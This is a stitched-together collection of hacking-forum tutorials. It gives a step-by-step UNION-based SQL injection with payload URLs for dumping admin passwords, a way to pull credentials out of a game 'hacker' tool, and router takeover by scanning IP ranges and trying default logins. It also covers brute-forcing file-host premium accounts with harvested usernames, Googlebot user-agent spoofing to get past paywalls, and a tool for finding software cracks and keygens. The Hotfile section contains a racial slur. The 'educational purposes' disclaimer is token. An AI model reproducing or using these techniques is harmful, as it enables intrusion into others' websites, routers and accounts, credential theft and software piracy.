first get a hacking tool no need to worry where to find just go to http://www.youtube.com and search "Runescape Hacker" or "Runescape Hacker Download Link"
you will get the downloading link in comments zone
now you have downloaded the hacker tool but -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Safe area!
download and install hexworkshop now dont ask for link...google is your friend
now right click on tool ,,you will see "Edit this with HexWorkshop"...click it
you will see a mess of words and alphabets symbols....dont worry dont get confused believe me its easy to do!
now press ctrl+f... a boz will appear
-Now Before start Finding Anything Make sure you change the "Hex" to "String" value.
-Now Enter "Gmail" to the Box and Hit "Find".
-You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.
-Copy the Highlighted text and Paste it in a Text document (Newly Created).
-Remove the [.]>DOTs and You will see The Email ID + the Passwd.
SQL injection is a code that exploits a vulnerability in the database of a website.
Step 1
Firstly we will find a site which is vulnerable to SQLI .
So surf the site till u get to a URL which looks like this -:
www . prateek . com/articles/index.php?id=213
By this i mean a url ending with something like this "php?id=213"
Now to check weder the site is vulnerable or not , we add a ' sign at the end of the URL.
Example = > www . prateek . com/articles/index.php?id=213'
If we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
or similar it means the site is vulnerable to SQLI.
Ok so now we will proceed to the next step
Step 2
Finding the number of columns , now we will find the number of columns with the ORDER BY command.
Example = >www . prateek . com/articles/index.php?id=213 order by 10--
So here we added the number 10 assuming that there are 10 colomns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'"
Ok this means that the number of coloms is less than 10 .So we continue to test by decreasing the number.
Example ==> www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--
Step 3
Now when we test it for 5 columns it does not give an error and if we test it for 6 it gives an error which means that the number of columns is 5.
So now as we know that there are 5 coiumns we will now use the UNION ALL command.
EXAMPLE = >
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--
As there were 5 columns we selected all the 5 columns.
When we execute this URL then on the page there will be number(s) displayed.
Like 2 or 3 or 4 etc.(This will not be greater than the number of columns) Step 4
Now the number which appeared we have to remember it as we will use it in the next step.
Let us assume that number 3 appeared.
So now we will check the version of MYSQL with the help of this number
Example - www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--
We used the @@version command to find out the version bieng used.
We replaced the number 3 (as we had got it in the last step) with @@version
Now after executing this the version number will be displayed. Step 5
like = > 5.0.51a-community
Now as the version is above 5 its fine.
Now we will find the names of columns and tables.
This will be done by -:
Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databse()--
After executing this , names of tables will be displayed.
It maybe anything .
Not them down. (choose names having admin , username , user etc in them)
Now we will find the names of columns
Example URL = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=databse()--
After executing this , names of columns will be displayed.
It maybe anything .
Not them down. (choose names having password, username , pass etc in them)
you might think what happens when you don't see a column like username or password?
then you have to do a little guessing.
Step 6
Now we will move further.
And place the names of columns and tables we noted down in the URL
Example = > www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--
In the above URL username is the column named username or user or admin etc. Similarly password is also a column. and the end part ie from admin (means the TABLE).
Thats it execute the URL and you will get the password in HASH (most probably , but if you are lucky you can even get it normally.)
Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.
Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
Voila! You're done!
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Ps:
Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension
Friends nw i am posting a new trick to gt keygens ,cracks,serials of any software by using CRAGGLE
if this thread already exist ...mods can delete
Enjoy:)
Craagle is a free downloadable standalone meta search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with. It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.
Craagle also supports usage of proxy server to bypass some sites that have Day Limit or daily usage limit. Craagle source code has over 100,000 characters (engine only, excluded GUI).
How to install?
There is no need to install the program as the exe is portable and can be run without any kind of installation process. To run the program just double click the craagle.exe file. To download click here.
How to search for cracks, serials or keygen in Craagle?
The user interface of Craagle is as follows:
Follow the steps:
Type the name of the software.
Select whether you want crack, serial or keygen.
You may also select a specific website you want to search.
Press Search.
Select the version of the software.
Right click and press Download to get the Key.
The Key will be displayed at the bottom as shown in the above figure.
Activate the software using the given key and Enjoy
Almost half of the Internet users across the globe use ADSL routers/modems to connect to the
Internet however, most of them are unaware of the fact that it has a
serious vulnerability which can easily be exploited even by a noob
hacker just like you. In this post I will show you how to exploit a
common vulnerability that lies in most ADSL routers so as to gain
complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is
possible to gain access to the router settings and configure the
device. The vulnerability actually lies in the Default username and
password that comes with the factory settings. Usually the
routers come preconfigured from the Internet Service provider and hence
the users do not bother to change the password later. This makes it
possible for the attackers to gain unauthorized access and modify
the router settings using a common set of default usernames and
passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Angry IP Scanner
Here is a detailed information on how to exploit the vulnerability of
an ADSL router. Step-1: Go to www.whatismyipaddress.com
Once the page is loaded you will find your IP address. Note it down. Step-2: Open Angry IP Scanner, here you will see an
option called IP Range: where you need to enter the
range of IP address to scan for.
Suppose your IP is 117.192.195.101,
you can set the range something as 117.192.194.0 to
117.192.200.255 so that there exists atleast 200-300 IP
addresses in the range.
Step-3: Go to Tools->Preferences
and select the Ports tab. Under Port selection
enter 80 (we need to scan for port 80). Now switch to
the Display tab, select the option “Hosts with
open ports only” and click on OK.
I have used Angry IP Scanner v3.0
beta-4. If you are using a different version, you need to Go to Options instead of Tools
Step-4: Now click on Start. After a
few minutes, the IP scanner will show a list of IPs with Port 80 open
as shown in the below image.
Step-5: Now copy any of the IP from the list, paste
it in your browser’s address bar and hit enter. A window will popup
asking for username and password. Since most users do not change the
passwords, it should most likely work with the default username and
password. For most routers the default username-password
pair will be admin-admin
or admin-password.
Just enter the username-password as specified above and hit enter. If
you are lucky you should gain access to the router settings page where
you can modify any of the router settings. The settings page can vary
from router to router. A sample router settings page is shown below.
If you do not succeed to gain access, select another IP from the list
and repeat the step-5. Atleast 1 out of 5 IPs will have a default
password and hence you will surely be able to gain access.
What can an Attacker do by Gaining Access to the Router Settings?
By gaining access to the router settings, it is possible for an
attacker to modify any of the router settings which results in the
malfunction of the router. As a result the target user’s computer will
be disconnected from the Internet. In the worst case the attacker can
copy the ISP login details from the router to steal the Internet
connection or play any kind of prank with the router settings. So the
victim has to reconfigure the router in order to bring it back to
action.
The Verdict:
If you are using an ADSL router to connect to the Internet, it is
highly recommended that you immediately change your password to prevent
any such attacks in the future. Who knows, you may be the next victim of
such an attack.
Since the configuration varies from router to router, you need
to contact your ISP for details on how to change the password for your
model.
Warning!
All the information provided in this post are for educational
purposes only. Please do not use this information for illegal purposes.
Lets start with Hotfile which is the
easiest to crack because Hotfile wont ban single IP. Tools
needed:-Elite Hotfile
Cracker+Checker-Checks if the cracked account is Premium or just Regular
while cracking.
-Hotfile Validity Scanner-This tool scans for
valid Hotfile usernames so you dont go nuts trying a 28MB wordlist when
theres less than 1000 valid HF users. Tools needed are at the end.
1.You need a good wordlist.One good tip
is to LEECH usernames from warez sites.They download games from the net
so out of 10 usernames about 5 would have a premium account.You just
need the correct password. Dont forget extensions.
Theres lots
of good wordlist on the net,you can google them. Like American
Names,Chinese Names,Nigg3r names wordlist etc. Please dont ask me
about the username leecher. Please dont ask me whats an extension.
-------------
2.Passwords-Think
of good passwords.There are many common passwords people use
like:123456,qwerty,f*cker,pen1shead or something like that. It just
depends on your creativity. Sometimes you might have the right
wordlist but the wrong password or vice versa.
Please
dont ask me what password i use.
-------------
3.Sockets- Sockets
= Number of connections. More sockets = Faster connection = Cracker
will tend to skip more often.The speed depends on your own connection
too.Put mine at 20-30(usually 20 is the default number)
Screenshot
That's it for Hotfile.Now you're ready
to crack accounts. GOOD LUCK!
And yeah this tut is short.
New look but has almost the same function
as the previous hotfile checker + cracker but with lesser options. I
would suggest putting the sockets at 5 - 10.
Posts
